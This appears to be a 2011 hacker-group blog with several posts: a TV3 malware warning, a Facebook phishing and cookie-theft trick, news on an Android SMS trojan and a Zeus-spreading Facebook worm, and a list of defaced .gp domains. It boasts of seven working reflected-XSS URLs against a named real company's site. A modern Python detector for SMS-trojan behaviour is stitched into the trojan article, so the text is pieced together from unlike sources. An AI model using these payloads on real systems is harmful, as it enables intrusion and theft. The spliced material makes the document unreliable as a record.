Thursday, 1 December 2011

Pls Pls, This Is Serious: TV3 Website Is Affected by Malware Which May Harm Your PC


Pls pls, this is serious: the TV3 website is affected by malware which may harm your PC. Our research shows that the virus was from a Chinese group of hackers. With this, we, the Ghana Cyber, warn the public to stay away from the site for a while till TV3 deals with the problem.
TV3  Malware

Vulnerability Description
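Website blocked by Google
When your website is searched for through Google, the search results display "This site may contain malware and may harm your computer."
If you visit your website directly using the Chrome or Firefox browser, the page that opens is not your website's own page but a Google warning page, with wording such as "Visiting this site may harm your computer!" or "Reported attack page!" to warn visiting users.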
Vulnerability Impact
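If a website is blocked by Google, traffic arriving from the Google search engine will inevitably be severely affected; more importantly, the website's reputation is seriously damaged.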
Vulnerability Recommendation
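1: Confirm whether the website has had malicious code planted in it or carries a virus; if so, clean it up first
2: Scan for and fix the website's vulnerabilities
3: Request a re-review according to Google's requirements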
Additional Info

Vulnerability content
Site is listed as suspicious - visiting this web site may harm your computer.

We as a group are doing everything in our power to pay back these hackers with a taste of their own. TV3 can contact us if need be, and anyone can inform their admins about this.

Multiple XSS Pages Found In Gold Fields (goldfields) by Ge3h

The Ghana Cyber Army is at it again.
Ge3h found these multiple XSSeds in Gold Fields. Funny, hmhhm: with the gold, they no fit keep a single site protected.

Links:
http://www.goldfields.co.za/search.php/%22%20stYle=%22x:expre/**/ssion(alert(9))

http://www.goldfields.co.za/inv_calendar.php?yearMonthDay=20111110&yearMonth=201111%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x000823)%3C%2Fscript%3E

http://www.goldfields.co.za/search.php?zoom_and=0&zoom_per_page=3&zoom_query=3&zoom_sort='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A83)%3C/script%3E

http://www.goldfields.co.za/search.php?zoom_query=3&zoom_and=1&zoom_sort='"--></style></script><script>alert(0x000A87)</script>

http://www.goldfields.co.za/inv_calendar.php?yearMonth=201110%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x000F5E)%3C%2Fscript%3E

http://www.goldfields.co.za/search.php?zoom_query=search+this+site&zoom_page=2%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x001C4A)%3C%2Fscript%3E&zoom_per_page=10&zoom_cat=-1&zoom_and=0&zoom_sort=0

http://www.goldfields.co.za/search.php?zoom_query=search+this+site&zoom_page=2&zoom_per_page=10%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert(0x001C8F)%3C%2Fscript%3E&zoom_cat=-1&zoom_and=0&zoom_sort=0


And even more to come soon...

Guadeloupe Google / Microsoft/ Motorola / Orange / Facebook / Youtube / Myspace / Live / Hotmail / Bing / Visa / Opera / Gmail / Joomla / Ubuntu / Internet / Bank America Hacked By dr@g







A hacker called dr@g has hacked and defaced Guadeloupe Google / Microsoft / Motorola / Orange / Facebook / Youtube / Myspace / Live / Hotmail / Bing / Visa / Opera / Gmail / Joomla / Ubuntu / Internet / Bank America. The hacker is in the team called Moroccain Security Cr3w.

Site:
http://www.google.gp/
http://www.google.com.gp/
http://www.google.net.gp/
http://microsoft.gp/
http://internet.gp/
http://motorola.gp/
http://orange.gp/
http://www.oracle.gp/
http://opera.gp/
http://ubuntu.gp/
http://yahoo.gp/
http://www.facebook.gp/
http://www.youtube.gp/
http://www.bing.gp/
http://www.joomla.gp/
http://www.myspace.gp/
http://www.ciscosystems.gp/
http://www.googleplus.gp/
http://www.gmail.gp/
http://live.gp/
http://bankamerica.gp/


Hacking a Facebook Account using Facebook


Many of us know that phishing and session hijacking are both tricks used to hack a Facebook account, but a hacker can do both at the same time. This vulnerability occurred on Facebook (static FBML). Example here

What will the user do?
1. Check the URL.
2. Check which year the page was created.

Is it easy to fool people?
Yes, by creating a new page on Facebook in such a way that the user believes it.

How does it work?
1. Once the user clicks the link, the session (cookies) is stolen by the hacker; using that, he can log in to any user's account without a username and password.
2. Usually the users will check the URL; once it is a known one, they enter a username and password.
3. After hitting the button "Test your Password", the page shows a thank-you message and pops up a password rank.
4. Check your email spam folder: there must be an email about this, saying that your password was wrong and to try again.

Countermeasures:
1. Don't click a new link from a person you don't know.
2. Facebook is not going to ask whether your password is strong or not.
3. Some viruses and worms (scams) are spreading through Facebook applications.

SMS Trojans Spreading to the Rest of the World



SMS Trojans that ride along on supposedly benign mobile apps and then send out messages to high-priced numbers have been a problem in some Asian and Eastern European countries for several years now, most notably in Russia and China. But now the attackers have realized that there's a whole big world of users out there to target and have begun going after people in other countries with new strains of SMS malware.
A new SMS Trojan, seen in some limited infections so far, is targeting users in a number of European and western countries right now, including Belgium, Canada, France, Germany, Luxembourg, Spain, Switzerland and the UK. The Trojan has a couple of main functions, each of which is designed to deceive the user and surreptitiously run up charges on her mobile bill.
The Trojan has been seen thus far hiding inside an app that supposedly monitors the victim's SMS and data usage on the device.

The Android app has shown up on file-sharing sites under the name SuiConFo.apk, according to research by Kaspersky Lab researcher Denis Maslennikov, and once it's installed on a victim's device, it will initially display an error message saying that the user's device isn't compatible with the app. That's just the beginning, however.
"Right after displaying this message the Trojan will call the public method getSimCountryIso in the TelephonyManager class in order to retrieve the ISO country code of the SIM card," Maslennikov wrote. "After defining the country and, therefore, the number and message text, the Trojan will send 4 SMS messages with the help of the sendTextMessage method. SMSReceiver.class is responsible for hiding incoming SMS messages from particular numbers. If there is an incoming SMS message from one of the following numbers: 81001, 35064, 63000, 9903, 60999, 543, 64747, then the Trojan will try to hide it using the abortBroadcast method. The number itself is retrieved from the SMS message with the help of getDisplayOriginatingAddress."
So the Trojan will remain in the background, checking for incoming messages from specific SMS numbers, and will then hide those messages from the user so she isn't aware of the infection and the fact that outgoing messages are being sent to premium-rate numbers. The charges for those messages can accumulate quickly, and if the user isn't aware that they're being sent, it can be an expensive infection.
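A static triage check for the behaviour chain described above (SIM country lookup, sendTextMessage, and abortBroadcast in an SMS_RECEIVED receiver), added here as an illustration; it is not code from the Kaspersky analysis or from the original article. It assumes a decoded AndroidManifest.xml and a list of smali-style call references as input; the function names, the verdict logic and the sample data are constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
API_ROLES = {
    "TelephonyManager;->getSimCountryIso": "country_lookup",
    "SmsManager;->sendTextMessage": "sms_send",
    "->abortBroadcast": "sms_hide",
}

def manifest_facts(manifest_xml):
    """Return (permission names, highest SMS_RECEIVED filter priority or None)."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANDROID + "name", "").rsplit(".", 1)[-1]
             for p in root.iter("uses-permission")}
    priority = None
    for flt in root.iter("intent-filter"):
        actions = {a.get(ANDROID + "name") for a in flt.iter("action")}
        if "android.provider.Telephony.SMS_RECEIVED" in actions:
            raw = flt.get(ANDROID + "priority", "0")
            value = int(raw) if raw.lstrip("-").isdigit() else 0
            priority = value if priority is None else max(priority, value)
    return perms, priority

def triage(manifest_xml, api_refs):
    """Match an app against the send-then-hide premium SMS pattern."""
    perms, priority = manifest_facts(manifest_xml)
    roles = {r for ref in api_refs for n, r in API_ROLES.items() if n in ref}
    findings = []
    if "SEND_SMS" in perms and "sms_send" in roles:
        findings.append("sends SMS from code")
    if "RECEIVE_SMS" in perms and "sms_hide" in roles and priority is not None:
        findings.append(f"can suppress incoming SMS (receiver priority {priority})")
    if {"country_lookup", "sms_send"} <= roles:
        findings.append("looks up SIM country and sends SMS")
    verdict = "suspicious" if len(findings) == 3 else "review" if findings else "clean"
    return verdict, findings

# Constructed sample input (not from the real SuiConFo.apk); com/example is a placeholder.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application><receiver android:name=".SMSReceiver">
    <intent-filter android:priority="1000">
      <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
    </intent-filter></receiver></application>
</manifest>"""
SAMPLE_REFS = ["Landroid/telephony/TelephonyManager;->getSimCountryIso()Ljava/lang/String;",
               "Landroid/telephony/SmsManager;->sendTextMessage(...)V",
               "Lcom/example/SMSReceiver;->abortBroadcast()V"]
```

Calling `triage(SAMPLE_MANIFEST, SAMPLE_REFS)` returns the verdict and the list of matched behaviours; an app that only matches part of the chain comes back as `review` rather than `suspicious`.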
Researchers have found similar SMS Trojans going after users in the United States, the UK and the Netherlands in recent months, but infections have been limited so far. That may well change as the popularity of Android devices--which have been the main target for SMS Trojans--continues to increase.

New Facebook Worm installing Zeus Bot in your Computer

Today another new attack on Facebook users with the Zeus bot has come into action. Researchers at Danish security firm CSIS have spotted a worm spreading within the Facebook platform. A new worm has popped up on Facebook, using apparently stolen user credentials to log in to victims' accounts and then send out malicious links to their friends. The worm also downloads and installs a variety of malware on users' machines, including a variant of the Zeus bot.

If followed, the link takes the potential victim to a page where he or she is offered what appears to be a screensaver for download. Unfortunately, it is not a JPG file, but an executable (b.exe). Once run, it drops a cocktail of malicious files onto the system, including ZeuS, a popular Trojan spyware capable of stealing user information from infected systems. The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMware.

Zeus is a common tool in the arsenal of many attackers these days, and is used in a wide variety of attacks and campaigns now. It used to be somewhat less common, but the appearance of cracked versions of the Zeus code has made it somewhat easier for lower-level attackers to get their hands on the malware. Zeus has a range of capabilities, and specializes in stealing sensitive user data, such as banking credentials, from infected machines.

"The worm carries a cocktail of malware onto your machine, including a Zbot/ZeuS variant which is a serious threat and stealing sensitive information from the infected machine," warn the researchers. The worm is hosted on a variety of domains, so the link in the malicious message may vary. Other servers are used to collect the data sent by the aforementioned malware and to serve additional malicious software.

This type of thing is very rare to just send to your email without you requesting it so I would advise anyone who thinks that you may have seen an email like this to delete it and mark it as spam right away.